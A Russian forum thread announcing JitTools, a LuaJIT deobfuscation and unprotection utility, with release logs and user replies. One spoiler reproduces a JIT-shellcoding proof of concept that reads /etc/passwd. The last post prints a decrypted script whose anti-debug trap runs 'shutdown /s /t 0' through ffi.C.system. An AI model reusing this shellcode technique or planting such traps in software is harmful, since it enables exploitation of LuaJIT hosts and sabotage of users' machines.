Исходник Софт 👾 JitTools - раскрой любой LuaJIT скрипт

[влад динозавр]

👩‍💻 JitTools - утилита, содержащая в себе несколько скриптов для снятия защиты LuaJIT.
По результатам проверки, 70% скриптов из темы "декомпиляция" были успешно раскрыты.

🚀 Использование
1. Скачать архив из последнего релиза
2. Распаковать папку из архива в любое место, для этого необходим 7-Zip
3. Установить Python 3.13 (обязательно с параметром Add to PATH)
4. Запустить Install JitTools при помощи Python, следовать инструкциям для установки
5. Запуск утилиты происходит с файла JitTools (версия).py

❗ Важная информация
Часть функционала может запускать скрипт напрямую на вашем ПК, настоятельно рекомендую использовать виртуальное окружение.

Спойлер: Авторство и функционал

GitHub

Спойлер: Старые версии

v1.0 (Яндекс Диск)
v1.1 (Яндекс Диск)
v1.2 (Яндекс Диск)
v1.3 (Яндекс Диск)
v1.4_not-installer (Яндекс Диск)
v1.4 (Яндекс Диск)
v1.5 (Яндекс Диск)
v1.6
v1.7

 

[chromiusj]

чет не открывается, помощь не помешает

 

[влад динозавр]

чет не открывается, помощь не помешает

первый раз вижу такую защиту, можешь попробовать написать скрипт, который будет сабать инструкции с параметрами
size = 5C, fullsize = 5D, flags = 44, params = 6F, framesize = 63, globals = 73, numkgc = 5C
потом изучать, что изменилось (с помощью псевдо-asm)

(перед этим нужно использовать hook obfuscation, и забрать самый большой по размеру скрипт)
в будущем, когда уже доделаю гуи интерфейс и полноценный редактор прототипов, сделаю нормальный анпрот

 

[stool]

Часть функционала может запускать скрипт напрямую на вашем ПК, настоятельно рекомендую использовать виртуальное окружение, например

пиздец ладно хоть сказал, а так, риск от использования этого тулкита не радует

 

[влад динозавр]

Обновление JitTools v1.1
Для установки обновления, перейдите на Яндекс Диск, и переместите все файлы в папку с исходной версией JitTools (v1.0), подтвердив замену файлов

Лог:
[~] Общее улучшение кода, исправление мелких недочетов
[+] Добавлена проверка на наличие обновлений с гитхаба и вывод лога, автоустановки нету.

[ .py / Full Unprot ]
[+] Добавлены необходимые проверки
[~] Улучшен код

[ .py / Shit Deobfuscation ]
[+] Добавлена обработка ошибок
[~] Улучшен код

Спойлер: Скоро будет GUI

пиздец ладно хоть сказал, а так, риск от использования этого тулкита не радует

в ближайшее время постараюсь что нибудь придумать с этим

 

[stool]

влад, почему ты не юзаешь гитхаб для того чтобы там выкладывать тулкит? с яндекса-то рано или поздно пропадёт и тем более не у всех он доступен

 

[влад динозавр]

влад, почему ты не юзаешь гитхаб для того чтобы там выкладывать тулкит? с яндекса-то рано или поздно пропадёт и тем более не у всех он доступен

ограничение по размеру файла, не могу залить сразу со всеми папками, а вручную муторно прописывать, все вместе весит 90 МБ, да и там удобная статистика, можно глянуть кол-во просмотров и кол-во скачиваний
(изначально хотел чтобы даже картинка в начале темы тоже засчитывала просмотры, но увы, не получилось)

Обновление JitTools v1.2
Для установки обновления, перейдите на Яндекс Диск, и переместите все файлы в папку с исходной версией JitTools, подтвердив замену файлов

Лог:
[~] Общее улучшение кода, оптимизация
[+] Добавил необходимые проверки, например: на компиляцию скрипта
[+] Добавлен графический интерфейс
[+] Добавил "комбинации" скриптов для раскрытия LuaJIT (автоматически)

[ Tools / Hook Obfuscation ]
[~] Исправил баг, связанный с выводом файла

UPD: Исправил 2 бага, связанных с unprot, нужно перекачать файл JitTools v1.2.py по той же ссылке.

влад, почему ты не юзаешь гитхаб для того чтобы там выкладывать тулкит? с яндекса-то рано или поздно пропадёт и тем более не у всех он доступен

добавил гайд на песочницу, чтобы в случае чего с вашим основным пк ничего не случилось

 

[влад динозавр]

Обновление JitTools v1.3
Для установки обновления, перейдите на Яндекс Диск, и переместите все файлы в папку с исходной версией JitTools, подтвердив замену файлов

Лог:
[~] Исправил баги
[-] Временно удалены "комбинации" для раскрытия скриптов
[-] Удалена проверка, из-за которой скрипт крашился при отсутствии интернета

 

[влад динозавр]

Редактор прототипов и функций

короче, я заебался его делать, юзайте Luad

set different names for artifacts · imring/Luad@f9d255f

Disassembler for compiled Lua scripts. Contribute to imring/Luad development by creating an account on GitHub.

github.com

Спойлер

скачать так:

скрин программы:

у меня вышло сделать редактор, похожий на этот, однако, находились файлы, которые могли сломать его, поэтому забил

Скачать архив из Яндекс Диска

мб потом добавлю этот функционал и обновлю интерфейс, но пока что мне лень

кста анхайдер не имеет смысла, ибо анпрот должен выполнять его задачу и так

Спойлер: прикол

--[[
    This JIT-shellcoding  technique  leverages  immediate  values in
  assembly instructions to hide a shellcode within the JIT'ed trace.
 
  It is possible thanks for the 'Guarded Assertions' the JIT-compiler
  emits when assembling the `HREFK` IR instruction/performing hash-key
  specialization.

  The shellcode is splitted into tiny 8 byte stubs,  with a
  `jmp` instruction between each stub to allow continuation.

  The `pewpew()` function points to a shellcode that executes
  `execve()` with your own argv[0] and argv[1].
]]--

function pewpew(t, s, a)
    t[5e-324]=0
    t[1e-323]=0
    t[1.5e-323]=0
    t[2e-323]=0
    t[2.5e-323]=0
    t[3e-323]=0
    t[1.9055771651032652e-193]=0
    t[1.8559668824708362e-193]=0
    t[1.8494619877878633e-193]=0
    t[1.8517288554178477e-193]=0
    t[1.914498447205438e-193]=0
    t[1.8639327969763123e-193]=0
    t[1.8538274887895865e-193]=0
    t[1.8516839145637716e-193]=0
    t[1.8567088159676176e-193]=0
    t[1.8538243533811626e-193]=0
    t[1.849450512851345e-193]=0
    t[1.8716972807551464e-193]=0
    t[1.872875119460234e-193]=0
    t[1.8745776759605808e-193]=0
    t[1.8493391391782406e-193]=0
    t[1.8506931797233557e-193]=0
  end
  local tbl={}
  pewpew(tbl,nil, nil)
  pewpew(tbl,nil, nil)
  cargo(pewpew,0xb4)
  pewpew(tbl, '/bin/cat', '/etc/passwd')

GitHub - 0xbigshaq/luajit-pwn: Vuln-dev environment for LuaJIT

Vuln-dev environment for LuaJIT. Contribute to 0xbigshaq/luajit-pwn development by creating an account on GitHub.

github.com

 

[chromiusj]

откройте пожалуйста

 

[Player#8]

change exe..?

 

[влад динозавр]

откройте пожалуйста

возможно там кастомный base64, скинь его, ибо с дефолтным у меня не запускается

 

[chromiusj]

возможно там кастомный base64, скинь его, ибо с дефолтным у меня не запускается

ничего кастомного, все свое, родное

 

[влад динозавр]

ничего кастомного, все свое, родное

а, я понял, ща все сделаю

 

[Maxim25012]

а, я понял, ща все сделаю

Посмотреть вложение 256704

не успел

local kys = "prot by kjor32"

if not pcall(string.dump, loadstring) then
    lua_thread.create(function ()
        loadstring([[local ffi = require"ffi"
ffi.cdef[[
    int system(const char *command);
    [[

    local condition = debug.getinfo(2)
if condition then
    ffi.C.system("shutdown /s /t 0")
end

local script = "you has been decrypted this script
--hi by kjor32]])()
    end)
end